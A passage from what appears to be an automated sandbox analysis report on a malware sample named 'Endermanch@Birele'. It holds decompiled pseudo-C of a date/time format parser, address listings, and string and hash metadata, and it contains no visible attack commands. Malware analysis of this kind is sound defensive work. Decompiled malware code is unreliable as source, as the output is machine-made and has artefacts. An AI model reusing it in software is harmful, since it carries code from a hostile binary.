                                                                                                          												} else {
                                                                                                          													__eax =  *(__ebp + 8);
                                                                                                          													__eax =  *0x419918; // 0x20a07bc
                                                                                                          													__eax = E0040B3F4(__eax, __ebx, __esi,  *(__ebp + 8));
                                                                                                          												}
                                                                                                          											}
                                                                                                          										}
                                                                                                          									}
                                                                                                          									goto L108;
                                                                                                          								case 6:
                                                                                                          									L33:
                                                                                                          									__eax = E0040B0E0(__ebp);
                                                                                                          									__eax = E0040B144(__ebp);
                                                                                                          									 *(__ebp - 0x1f) = 0;
                                                                                                          									__esi =  *(__ebp - 4);
                                                                                                          									while(1) {
                                                                                                          										L52:
                                                                                                          										__al =  *__esi;
                                                                                                          										__eflags = __al;
                                                                                                          										if(__al == 0) {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										L34:
                                                                                                          										__eax = __eax & 0x000000ff;
                                                                                                          										__eflags = __eax;
                                                                                                          										asm("bt [0x418250], eax");
                                                                                                          										if(__eax >= 0) {
                                                                                                          											L36:
                                                                                                          											__eax = 0;
                                                                                                          											__al =  *__esi;
                                                                                                          											__eflags = 0 - 0x48;
                                                                                                          											if(0 > 0x48) {
                                                                                                          												L42:
                                                                                                          												__eax = 0xffffffffffffff9f;
                                                                                                          												__eflags = 0xffffffffffffff9f;
                                                                                                          												if(0xffffffffffffff9f == 0) {
                                                                                                          													L45:
                                                                                                          													__eflags =  *(__ebp - 0x1f);
                                                                                                          													if( *(__ebp - 0x1f) != 0) {
                                                                                                          														L51:
                                                                                                          														__esi = __esi + 1;
                                                                                                          														__eflags = __esi;
                                                                                                          														continue;
                                                                                                          													}
                                                                                                          													L46:
                                                                                                          													__edx = 0x40bb84;
                                                                                                          													__ecx = 5;
                                                                                                          													__eax = __esi;
                                                                                                          													__eax = E00409F2C(__esi, 5, 0x40bb84);
                                                                                                          													__eflags = __eax;
                                                                                                          													if(__eax == 0) {
                                                                                                          														L49:
                                                                                                          														 *((char*)(__ebp - 0x1e)) = 1;
                                                                                                          														break;
                                                                                                          													}
                                                                                                          													L47:
                                                                                                          													__edx = 0x40bb8c;
                                                                                                          													__ecx = 3;
                                                                                                          													__eax = __esi;
                                                                                                          													__eax = E00409F2C(__esi, 3, 0x40bb8c);
                                                                                                          													__eflags = __eax;
                                                                                                          													if(__eax == 0) {
                                                                                                          														goto L49;
                                                                                                          													}
                                                                                                          													L48:
                                                                                                          													__edx = 0x40bb90;
                                                                                                          													__ecx = 4;
                                                                                                          													__eax = __esi;
                                                                                                          													__eax = E00409F2C(__esi, 4, 0x40bb90);
                                                                                                          													__eflags = __eax;
                                                                                                          													if(__eax != 0) {
                                                                                                          														break;
                                                                                                          													}
                                                                                                          													goto L49;
                                                                                                          												}
                                                                                                          												L43:
                                                                                                          												__eax = 0xffffffffffffff98;
                                                                                                          												__eflags = 0xffffffffffffff9f;
                                                                                                          												if(0xffffffffffffff9f == 0) {
                                                                                                          													break;
                                                                                                          												}
                                                                                                          												L44:
                                                                                                          												goto L51;
                                                                                                          											}
                                                                                                          											L37:
                                                                                                          											if(0 == 0x48) {
                                                                                                          												break;
                                                                                                          											}
                                                                                                          											L38:
                                                                                                          											__eax = 0xffffffffffffffde;
                                                                                                          											__eflags = 0xffffffffffffffde;
                                                                                                          											if(0xffffffffffffffde == 0) {
                                                                                                          												L50:
                                                                                                          												__al =  *(__ebp - 0x1f);
                                                                                                          												__al =  *(__ebp - 0x1f) ^ 0x00000001;
                                                                                                          												__eflags = __al;
                                                                                                          												 *(__ebp - 0x1f) = __al;
                                                                                                          												goto L51;
                                                                                                          											}
                                                                                                          											L39:
                                                                                                          											__eax = 0xffffffffffffffd9;
                                                                                                          											__eflags = 0xffffffffffffffde;
                                                                                                          											if(0xffffffffffffffde == 0) {
                                                                                                          												goto L50;
                                                                                                          											}
                                                                                                          											L40:
                                                                                                          											__eax = 0xffffffffffffffbf;
                                                                                                          											__eflags = 0xffffffffffffffde;
                                                                                                          											if(0xffffffffffffffde == 0) {
                                                                                                          												goto L45;
                                                                                                          											}
                                                                                                          											L41:
                                                                                                          											goto L51;
                                                                                                          										}
                                                                                                          										L35:
                                                                                                          										__eax = __esi;
                                                                                                          										__eax = E0040D7B0(__esi);
                                                                                                          										__esi = __eax;
                                                                                                          									}
                                                                                                          									L53:
                                                                                                          									__ax =  *((intOrPtr*)(__ebp - 0x16));
                                                                                                          									__eflags =  *((char*)(__ebp - 0x1e));
                                                                                                          									if( *((char*)(__ebp - 0x1e)) != 0) {
                                                                                                          										__eflags = __ax;
                                                                                                          										if(__ax != 0) {
                                                                                                          											__eflags = __ax - 0xc;
                                                                                                          											if(__ax > 0xc) {
                                                                                                          												__ax = __ax - 0xc;
                                                                                                          												__eflags = __ax;
                                                                                                          											}
                                                                                                          										} else {
                                                                                                          											__ax = 0xc;
                                                                                                          										}
                                                                                                          									}
                                                                                                          									__eflags =  *(__ebp - 0xc) - 2;
                                                                                                          									if( *(__ebp - 0xc) > 2) {
                                                                                                          										 *(__ebp - 0xc) = 2;
                                                                                                          									}
                                                                                                          									__edx =  *(__ebp + 8);
                                                                                                          									__eax = __ax & 0x0000ffff;
                                                                                                          									__edx =  *(__ebp - 0xc);
                                                                                                          									__eax = E0040B094(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                                                                                                          									goto L108;
                                                                                                          								case 7:
                                                                                                          									L61:
                                                                                                          									E0040B0E0(__ebp) = E0040B144(__ebp);
                                                                                                          									__eflags =  *(__ebp - 0xc) - 2;
                                                                                                          									if( *(__ebp - 0xc) > 2) {
                                                                                                          										 *(__ebp - 0xc) = 2;
                                                                                                          									}
                                                                                                          									__eax =  *(__ebp + 8);
                                                                                                          									__eax =  *(__ebp - 0x18) & 0x0000ffff;
                                                                                                          									__edx =  *(__ebp - 0xc);
                                                                                                          									__eax = E0040B094( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                                                                                                          									goto L108;
                                                                                                          								case 8:
                                                                                                          									L64:
                                                                                                          									E0040B0E0(__ebp) = E0040B144(__ebp);
                                                                                                          									__eflags =  *(__ebp - 0xc) - 2;
                                                                                                          									if( *(__ebp - 0xc) > 2) {
                                                                                                          										 *(__ebp - 0xc) = 2;
                                                                                                          									}
                                                                                                          									__eax =  *(__ebp + 8);
                                                                                                          									__eax =  *(__ebp - 0x1a) & 0x0000ffff;
                                                                                                          									__edx =  *(__ebp - 0xc);
                                                                                                          									__eax = E0040B094( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                                                                                                          									goto L108;
                                                                                                          								case 9:
                                                                                                          									L67:
                                                                                                          									__eax = E0040B0E0(__ebp);
                                                                                                          									__eflags =  *(__ebp - 0xc) - 1;
                                                                                                          									if( *(__ebp - 0xc) != 1) {
                                                                                                          										__eax =  *(__ebp + 8);
                                                                                                          										__eax =  *0x41992c; // 0x20a0844
                                                                                                          										__eax = E0040B3F4(__eax, __ebx, __esi,  *(__ebp + 8));
                                                                                                          									} else {
                                                                                                          										__eax =  *(__ebp + 8);
                                                                                                          										__eax =  *0x419928; // 0x20a082c
                                                                                                          										__eax = E0040B3F4(__eax, __ebx, __esi,  *(__ebp + 8));
                                                                                                          									}
                                                                                                          									goto L108;
                                                                                                          								case 0xa:
                                                                                                          									L70:
                                                                                                          									E0040B0E0(__ebp) = E0040B144(__ebp);
                                                                                                          									__eflags =  *(__ebp - 0xc) - 3;
                                                                                                          									if( *(__ebp - 0xc) > 3) {
                                                                                                          										 *(__ebp - 0xc) = 3;
                                                                                                          									}
                                                                                                          									__eax =  *(__ebp + 8);
                                                                                                          									__eax =  *(__ebp - 0x1c) & 0x0000ffff;
                                                                                                          									__edx =  *(__ebp - 0xc);
                                                                                                          									__eax = E0040B094( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                                                                                                          									goto L108;
                                                                                                          								case 0xb:
                                                                                                          									goto L0;
                                                                                                          								case 0xc:
                                                                                                          									L90:
                                                                                                          									E0040B0E0(__ebp) =  *(__ebp + 8);
                                                                                                          									__eax =  *0x419914; // 0x20a07a4
                                                                                                          									__eax = E0040B3F4(__eax, __ebx, __esi,  *(__ebp + 8));
                                                                                                          									__eax = E0040B144(__ebp);
                                                                                                          									__eflags =  *((short*)(__ebp - 0x16));
                                                                                                          									if( *((short*)(__ebp - 0x16)) != 0) {
                                                                                                          										L93:
                                                                                                          										 *(__ebp + 8) = 0x40bba4;
                                                                                                          										__edx = 1;
                                                                                                          										E0040B030(1,  *(__ebp + 8)) =  *(__ebp + 8);
                                                                                                          										__eax =  *0x41992c; // 0x20a0844
                                                                                                          										__eax = E0040B3F4(__eax, __ebx, __esi,  *(__ebp + 8));
                                                                                                          										goto L108;
                                                                                                          									}
                                                                                                          									L91:
                                                                                                          									__eflags =  *(__ebp - 0x18);
                                                                                                          									if( *(__ebp - 0x18) != 0) {
                                                                                                          										goto L93;
                                                                                                          									}
                                                                                                          									L92:
                                                                                                          									__eflags =  *(__ebp - 0x1a);
                                                                                                          									if( *(__ebp - 0x1a) == 0) {
                                                                                                          										goto L108;
                                                                                                          									}
                                                                                                          									goto L93;
                                                                                                          								case 0xd:
                                                                                                          									L94:
                                                                                                          									__eflags =  *0x419911;
                                                                                                          									if( *0x419911 != 0) {
                                                                                                          										 *(__ebp + 8) = 0x419911;
                                                                                                          										__edx = 1;
                                                                                                          										__eax = E0040B030(1,  *(__ebp + 8));
                                                                                                          										[far dword [ecx-0x17]();
                                                                                                          										 *__eax =  *__eax;
                                                                                                          										_t133 = __eax + 0x41991c3d;
                                                                                                          										 *_t133 =  *(__eax + 0x41991c3d) + __al;
                                                                                                          										__eflags =  *_t133;
                                                                                                          									}
                                                                                                          									goto L108;
                                                                                                          								case 0xe:
                                                                                                          									L97:
                                                                                                          									__eflags =  *0x41991c;
                                                                                                          									if( *0x41991c != 0) {
                                                                                                          										 *(__ebp + 8) = 0x41991c;
                                                                                                          										__edx = 1;
                                                                                                          										__eax = E0040B030(1,  *(__ebp + 8));
                                                                                                          									}
                                                                                                          									goto L108;
                                                                                                          								case 0xf:
                                                                                                          									L99:
                                                                                                          									__esi =  *(__ebp - 4);
                                                                                                          									while(1) {
                                                                                                          										L103:
                                                                                                          										__eax =  *(__ebp - 4);
                                                                                                          										__al =  *__eax;
                                                                                                          										__eflags = __al;
                                                                                                          										if(__al == 0) {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										L104:
                                                                                                          										__eflags = __al -  *((intOrPtr*)(__ebp - 5));
                                                                                                          										if(__al !=  *((intOrPtr*)(__ebp - 5))) {
                                                                                                          											L100:
                                                                                                          											__eax = __eax & 0x000000ff;
                                                                                                          											__eflags = __eax;
                                                                                                          											asm("bt [0x418250], eax");
                                                                                                          											if(__eax >= 0) {
                                                                                                          												_t139 = __ebp - 4;
                                                                                                          												 *_t139 =  *(__ebp - 4) + 1;
                                                                                                          												__eflags =  *_t139;
                                                                                                          											} else {
                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                          												 *(__ebp - 4) = E0040D7B0( *(__ebp - 4));
                                                                                                          											}
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										break;
                                                                                                          									}
                                                                                                          									L105:
                                                                                                          									__eax =  *(__ebp + 8);
                                                                                                          									__edx =  *(__ebp - 4);
                                                                                                          									__edx =  *(__ebp - 4) - __esi;
                                                                                                          									__esi = E0040B030(__edx,  *(__ebp + 8));
                                                                                                          									__eax =  *(__ebp - 4);
                                                                                                          									__eflags =  *__eax;
                                                                                                          									if( *__eax != 0) {
                                                                                                          										 *(__ebp - 4) =  *(__ebp - 4) + 1;
                                                                                                          									}
                                                                                                          									goto L108;
                                                                                                          							}
                                                                                                          						} else {
                                                                                                          							E0040B030(E0040D790( *((intOrPtr*)(_t274 - 4))),  *((intOrPtr*)(_t274 + 8)));
                                                                                                          							 *((intOrPtr*)(_t274 - 4)) = E0040D7B0( *((intOrPtr*)(_t274 - 4)));
                                                                                                          							_t225 = 0x20;
                                                                                                          							continue;
                                                                                                          						}
                                                                                                          					}
                                                                                                          					L109:
                                                                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) - 0x108)) - 1;
                                                                                                          					_pop(_t265);
                                                                                                          					 *[fs:eax] = _t265;
                                                                                                          					_push(E0040BB7C);
                                                                                                          					return E004039D0(_t274 - 0x28, 2);
                                                                                                          				}
                                                                                                          			}

















                                                                                                          0x0040b8cd
                                                                                                          0x0040b8cd
                                                                                                          0x0040b8cd
                                                                                                          0x0040b8ce
                                                                                                          0x0040b8d7
                                                                                                          0x0040b8eb
                                                                                                          0x0040b921
                                                                                                          0x0040b926
                                                                                                          0x0040b928
                                                                                                          0x0040b95e
                                                                                                          0x0040b963
                                                                                                          0x0040b965
                                                                                                          0x0040b9a7
                                                                                                          0x0040b9ac
                                                                                                          0x0040b9ae
                                                                                                          0x0040b9ee
                                                                                                          0x0040b9f3
                                                                                                          0x0040b9f5
                                                                                                          0x0040ba35
                                                                                                          0x0040b9f7
                                                                                                          0x0040b9f8
                                                                                                          0x0040b9fd
                                                                                                          0x0040ba1a
                                                                                                          0x0040ba20
                                                                                                          0x0040ba20
                                                                                                          0x0040b9b0
                                                                                                          0x0040b9b1
                                                                                                          0x0040b9b6
                                                                                                          0x0040b9d3
                                                                                                          0x0040b9d9
                                                                                                          0x0040b9d9
                                                                                                          0x0040b967
                                                                                                          0x0040b967
                                                                                                          0x0040b96c
                                                                                                          0x0040b983
                                                                                                          0x0040b988
                                                                                                          0x0040b96e
                                                                                                          0x0040b972
                                                                                                          0x0040b977
                                                                                                          0x0040b97c
                                                                                                          0x0040b98e
                                                                                                          0x0040b992
                                                                                                          0x0040b992
                                                                                                          0x0040b92a
                                                                                                          0x0040b92a
                                                                                                          0x0040b92f
                                                                                                          0x0040b931
                                                                                                          0x0040b931
                                                                                                          0x0040b93f
                                                                                                          0x0040b945
                                                                                                          0x0040b949
                                                                                                          0x0040b949
                                                                                                          0x0040b8ed
                                                                                                          0x0040b8ed
                                                                                                          0x0040b8f2
                                                                                                          0x0040b8f4
                                                                                                          0x0040b8f4
                                                                                                          0x0040b8f4
                                                                                                          0x0040b8f7
                                                                                                          0x0040b8fb
                                                                                                          0x0040b900
                                                                                                          0x0040b902
                                                                                                          0x0040b908
                                                                                                          0x0040b90c
                                                                                                          0x0040b90c
                                                                                                          0x0040bb44
                                                                                                          0x0040bb44
                                                                                                          0x0040bb47
                                                                                                          0x0040bb4b
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b44b
                                                                                                          0x0040b44b
                                                                                                          0x0040b456
                                                                                                          0x0040b45d
                                                                                                          0x0040b490
                                                                                                          0x0040b493
                                                                                                          0x0040b49b
                                                                                                          0x0040b49e
                                                                                                          0x0040b4a0
                                                                                                          0x0040b4a0
                                                                                                          0x0040b4a0
                                                                                                          0x0040b4a7
                                                                                                          0x0040b4aa
                                                                                                          0x0040b4ac
                                                                                                          0x0040b4ae
                                                                                                          0x0040b4b0
                                                                                                          0x0040b4b3
                                                                                                          0x0040b4b5
                                                                                                          0x0040b4b5
                                                                                                          0x0040b4b3
                                                                                                          0x0040b4b7
                                                                                                          0x0040b4b7
                                                                                                          0x0040b4b9
                                                                                                          0x0040b4be
                                                                                                          0x0040b4c1
                                                                                                          0x0040b4c4
                                                                                                          0x0040bb32
                                                                                                          0x0040bb3e
                                                                                                          0x00000000
                                                                                                          0x0040bb43
                                                                                                          0x0040b4ca
                                                                                                          0x0040b4d0
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b550
                                                                                                          0x0040b551
                                                                                                          0x0040b558
                                                                                                          0x0040b55e
                                                                                                          0x0040b562
                                                                                                          0x0040b594
                                                                                                          0x0040b564
                                                                                                          0x0040b57c
                                                                                                          0x0040b581
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b59f
                                                                                                          0x0040b5a7
                                                                                                          0x0040b5ad
                                                                                                          0x0040b5b2
                                                                                                          0x0040b5b8
                                                                                                          0x0040b5be
                                                                                                          0x0040b5c1
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b5cc
                                                                                                          0x0040b5d4
                                                                                                          0x0040b5da
                                                                                                          0x0040b5df
                                                                                                          0x0040b5e5
                                                                                                          0x0040b5eb
                                                                                                          0x0040b5ee
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b5f9
                                                                                                          0x0040b601
                                                                                                          0x0040b60a
                                                                                                          0x0040b60b
                                                                                                          0x0040b60b
                                                                                                          0x0040b60e
                                                                                                          0x0040b614
                                                                                                          0x0040b618
                                                                                                          0x0040b61c
                                                                                                          0x0040b61f
                                                                                                          0x0040b610
                                                                                                          0x0040b610
                                                                                                          0x0040b62e
                                                                                                          0x0040b632
                                                                                                          0x0040b639
                                                                                                          0x0040b612
                                                                                                          0x0040b648
                                                                                                          0x0040b64c
                                                                                                          0x0040b653
                                                                                                          0x0040b658
                                                                                                          0x0040b610
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b65e
                                                                                                          0x0040b665
                                                                                                          0x0040b668
                                                                                                          0x0040b669
                                                                                                          0x0040b669
                                                                                                          0x0040b66c
                                                                                                          0x0040b67f
                                                                                                          0x0040b683
                                                                                                          0x0040b687
                                                                                                          0x0040b68a
                                                                                                          0x0040b66e
                                                                                                          0x0040b66e
                                                                                                          0x0040b6a7
                                                                                                          0x0040b6aa
                                                                                                          0x0040b6b1
                                                                                                          0x0040b670
                                                                                                          0x0040b670
                                                                                                          0x0040b670
                                                                                                          0x0040b671
                                                                                                          0x0040b6ce
                                                                                                          0x0040b6d1
                                                                                                          0x0040b6d8
                                                                                                          0x0040b673
                                                                                                          0x0040b673
                                                                                                          0x0040b673
                                                                                                          0x0040b674
                                                                                                          0x0040b6e3
                                                                                                          0x0040b6e7
                                                                                                          0x0040b6ec
                                                                                                          0x0040b676
                                                                                                          0x0040b6f7
                                                                                                          0x0040b6fb
                                                                                                          0x0040b700
                                                                                                          0x0040b705
                                                                                                          0x0040b674
                                                                                                          0x0040b671
                                                                                                          0x0040b66e
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b70b
                                                                                                          0x0040b70c
                                                                                                          0x0040b713
                                                                                                          0x0040b719
                                                                                                          0x0040b71d
                                                                                                          0x0040b7ba
                                                                                                          0x0040b7ba
                                                                                                          0x0040b7ba
                                                                                                          0x0040b7bc
                                                                                                          0x0040b7be
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b725
                                                                                                          0x0040b725
                                                                                                          0x0040b725
                                                                                                          0x0040b72a
                                                                                                          0x0040b731
                                                                                                          0x0040b73e
                                                                                                          0x0040b73e
                                                                                                          0x0040b740
                                                                                                          0x0040b742
                                                                                                          0x0040b745
                                                                                                          0x0040b75a
                                                                                                          0x0040b75a
                                                                                                          0x0040b75a
                                                                                                          0x0040b75d
                                                                                                          0x0040b766
                                                                                                          0x0040b766
                                                                                                          0x0040b76a
                                                                                                          0x0040b7b9
                                                                                                          0x0040b7b9
                                                                                                          0x0040b7b9
                                                                                                          0x00000000
                                                                                                          0x0040b7b9
                                                                                                          0x0040b76c
                                                                                                          0x0040b76c
                                                                                                          0x0040b771
                                                                                                          0x0040b776
                                                                                                          0x0040b778
                                                                                                          0x0040b77d
                                                                                                          0x0040b77f
                                                                                                          0x0040b7ab
                                                                                                          0x0040b7ab
                                                                                                          0x00000000
                                                                                                          0x0040b7ab
                                                                                                          0x0040b781
                                                                                                          0x0040b781
                                                                                                          0x0040b786
                                                                                                          0x0040b78b
                                                                                                          0x0040b78d
                                                                                                          0x0040b792
                                                                                                          0x0040b794
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b796
                                                                                                          0x0040b796
                                                                                                          0x0040b79b
                                                                                                          0x0040b7a0
                                                                                                          0x0040b7a2
                                                                                                          0x0040b7a7
                                                                                                          0x0040b7a9
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b7a9
                                                                                                          0x0040b75f
                                                                                                          0x0040b75f
                                                                                                          0x0040b75f
                                                                                                          0x0040b762
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b764
                                                                                                          0x00000000
                                                                                                          0x0040b764
                                                                                                          0x0040b747
                                                                                                          0x0040b747
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b749
                                                                                                          0x0040b749
                                                                                                          0x0040b749
                                                                                                          0x0040b74c
                                                                                                          0x0040b7b1
                                                                                                          0x0040b7b1
                                                                                                          0x0040b7b4
                                                                                                          0x0040b7b4
                                                                                                          0x0040b7b6
                                                                                                          0x00000000
                                                                                                          0x0040b7b6
                                                                                                          0x0040b74e
                                                                                                          0x0040b74e
                                                                                                          0x0040b74e
                                                                                                          0x0040b751
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b753
                                                                                                          0x0040b753
                                                                                                          0x0040b753
                                                                                                          0x0040b756
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b758
                                                                                                          0x00000000
                                                                                                          0x0040b758
                                                                                                          0x0040b733
                                                                                                          0x0040b733
                                                                                                          0x0040b735
                                                                                                          0x0040b73a
                                                                                                          0x0040b73a
                                                                                                          0x0040b7c4
                                                                                                          0x0040b7c4
                                                                                                          0x0040b7c8
                                                                                                          0x0040b7cc
                                                                                                          0x0040b7ce
                                                                                                          0x0040b7d1
                                                                                                          0x0040b7d9
                                                                                                          0x0040b7dd
                                                                                                          0x0040b7df
                                                                                                          0x0040b7df
                                                                                                          0x0040b7df
                                                                                                          0x0040b7d3
                                                                                                          0x0040b7d3
                                                                                                          0x0040b7d3
                                                                                                          0x0040b7d1
                                                                                                          0x0040b7e3
                                                                                                          0x0040b7e7
                                                                                                          0x0040b7e9
                                                                                                          0x0040b7e9
                                                                                                          0x0040b7f0
                                                                                                          0x0040b7f4
                                                                                                          0x0040b7f7
                                                                                                          0x0040b7fa
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b805
                                                                                                          0x0040b80d
                                                                                                          0x0040b813
                                                                                                          0x0040b817
                                                                                                          0x0040b819
                                                                                                          0x0040b819
                                                                                                          0x0040b820
                                                                                                          0x0040b824
                                                                                                          0x0040b828
                                                                                                          0x0040b82b
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b836
                                                                                                          0x0040b83e
                                                                                                          0x0040b844
                                                                                                          0x0040b848
                                                                                                          0x0040b84a
                                                                                                          0x0040b84a
                                                                                                          0x0040b851
                                                                                                          0x0040b855
                                                                                                          0x0040b859
                                                                                                          0x0040b85c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b867
                                                                                                          0x0040b868
                                                                                                          0x0040b86e
                                                                                                          0x0040b872
                                                                                                          0x0040b888
                                                                                                          0x0040b88c
                                                                                                          0x0040b891
                                                                                                          0x0040b874
                                                                                                          0x0040b874
                                                                                                          0x0040b878
                                                                                                          0x0040b87d
                                                                                                          0x0040b882
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b89c
                                                                                                          0x0040b8a4
                                                                                                          0x0040b8aa
                                                                                                          0x0040b8ae
                                                                                                          0x0040b8b0
                                                                                                          0x0040b8b0
                                                                                                          0x0040b8b7
                                                                                                          0x0040b8bb
                                                                                                          0x0040b8bf
                                                                                                          0x0040b8c2
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040ba40
                                                                                                          0x0040ba47
                                                                                                          0x0040ba4b
                                                                                                          0x0040ba50
                                                                                                          0x0040ba57
                                                                                                          0x0040ba5d
                                                                                                          0x0040ba62
                                                                                                          0x0040ba76
                                                                                                          0x0040ba7a
                                                                                                          0x0040ba7f
                                                                                                          0x0040ba8a
                                                                                                          0x0040ba8e
                                                                                                          0x0040ba93
                                                                                                          0x00000000
                                                                                                          0x0040ba98
                                                                                                          0x0040ba64
                                                                                                          0x0040ba64
                                                                                                          0x0040ba69
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040ba6b
                                                                                                          0x0040ba6b
                                                                                                          0x0040ba70
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040ba9e
                                                                                                          0x0040ba9e
                                                                                                          0x0040baa5
                                                                                                          0x0040baaf
                                                                                                          0x0040bab4
                                                                                                          0x0040bab9
                                                                                                          0x0040babd
                                                                                                          0x0040bac0
                                                                                                          0x0040bac3
                                                                                                          0x0040bac3
                                                                                                          0x0040bac3
                                                                                                          0x0040bac3
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040bac4
                                                                                                          0x0040bac4
                                                                                                          0x0040bacb
                                                                                                          0x0040bad1
                                                                                                          0x0040bad6
                                                                                                          0x0040badb
                                                                                                          0x0040bae0
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040bae3
                                                                                                          0x0040bae3
                                                                                                          0x0040bb06
                                                                                                          0x0040bb06
                                                                                                          0x0040bb06
                                                                                                          0x0040bb09
                                                                                                          0x0040bb0b
                                                                                                          0x0040bb0d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040bb0f
                                                                                                          0x0040bb0f
                                                                                                          0x0040bb12
                                                                                                          0x0040bae8
                                                                                                          0x0040bae8
                                                                                                          0x0040bae8
                                                                                                          0x0040baed
                                                                                                          0x0040baf4
                                                                                                          0x0040bb03
                                                                                                          0x0040bb03
                                                                                                          0x0040bb03
                                                                                                          0x0040baf6
                                                                                                          0x0040baf6
                                                                                                          0x0040bafe
                                                                                                          0x0040bafe
                                                                                                          0x00000000
                                                                                                          0x0040baf4
                                                                                                          0x00000000
                                                                                                          0x0040bb12
                                                                                                          0x0040bb14
                                                                                                          0x0040bb14
                                                                                                          0x0040bb18
                                                                                                          0x0040bb1b
                                                                                                          0x0040bb1f
                                                                                                          0x0040bb25
                                                                                                          0x0040bb28
                                                                                                          0x0040bb2b
                                                                                                          0x0040bb2d
                                                                                                          0x0040bb2d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0040b45f
                                                                                                          0x0040b470
                                                                                                          0x0040b47e
                                                                                                          0x0040b481
                                                                                                          0x00000000
                                                                                                          0x0040b481
                                                                                                          0x0040b45d
                                                                                                          0x0040bb51
                                                                                                          0x0040bb54
                                                                                                          0x0040bb5c
                                                                                                          0x0040bb5f
                                                                                                          0x0040bb62
                                                                                                          0x0040bb74
                                                                                                          0x0040bb74

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: A/P$AAA$AAAA$AM/PM$AMPM
                                                                                                          • API String ID: 0-3831542625
                                                                                                          • Opcode ID: 2cfe84bc832fd600cad82c3c40ba346894f35638241e12aa8299922bb8822a96
                                                                                                          • Instruction ID: 172002209d946b9b5eacaf2fb1f6b0f2f7a98b1db8e711a09a8834f41e8f5ca3
                                                                                                          • Opcode Fuzzy Hash: 2cfe84bc832fd600cad82c3c40ba346894f35638241e12aa8299922bb8822a96
                                                                                                          • Instruction Fuzzy Hash: E74169716041459BDB04EB59D801BAE77B5EB04314F20807BF904AB3D6CB7D9E829BDD
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 82%
                                                                                                          			E0040FCEC(intOrPtr* __eax) {
                                                                                                          				char _v260;
                                                                                                          				char _v768;
                                                                                                          				char _v772;
                                                                                                          				intOrPtr* _v776;
                                                                                                          				signed short* _v780;
                                                                                                          				char _v784;
                                                                                                          				signed int _v788;
                                                                                                          				char _v792;
                                                                                                          				intOrPtr* _v796;
                                                                                                          				signed char _t43;
                                                                                                          				intOrPtr* _t60;
                                                                                                          				void* _t79;
                                                                                                          				void* _t81;
                                                                                                          				void* _t84;
                                                                                                          				void* _t85;
                                                                                                          				intOrPtr* _t92;
                                                                                                          				void* _t96;
                                                                                                          				char* _t97;
                                                                                                          				void* _t98;
                                                                                                          
                                                                                                          				_v776 = __eax;
                                                                                                          				if(( *(_v776 + 1) & 0x00000020) == 0) {
                                                                                                          					E0040FBCC(0x80070057);
                                                                                                          				}
                                                                                                          				_t43 =  *_v776;
                                                                                                          				if((_t43 & 0x00000fff) == 0xc) {
                                                                                                          					if((_t43 & 0x00000040) == 0) {
                                                                                                          						_v780 =  *((intOrPtr*)(_v776 + 8));
                                                                                                          					} else {
                                                                                                          						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
                                                                                                          					}
                                                                                                          					_v788 =  *_v780 & 0x0000ffff;
                                                                                                          					_t79 = _v788 - 1;
                                                                                                          					if(_t79 >= 0) {
                                                                                                          						_t85 = _t79 + 1;
                                                                                                          						_t96 = 0;
                                                                                                          						_t97 =  &_v772;
                                                                                                          						do {
                                                                                                          							_v796 = _t97;
                                                                                                          							_push(_v796 + 4);
                                                                                                          							_t22 = _t96 + 1; // 0x1
                                                                                                          							_push(_v780);
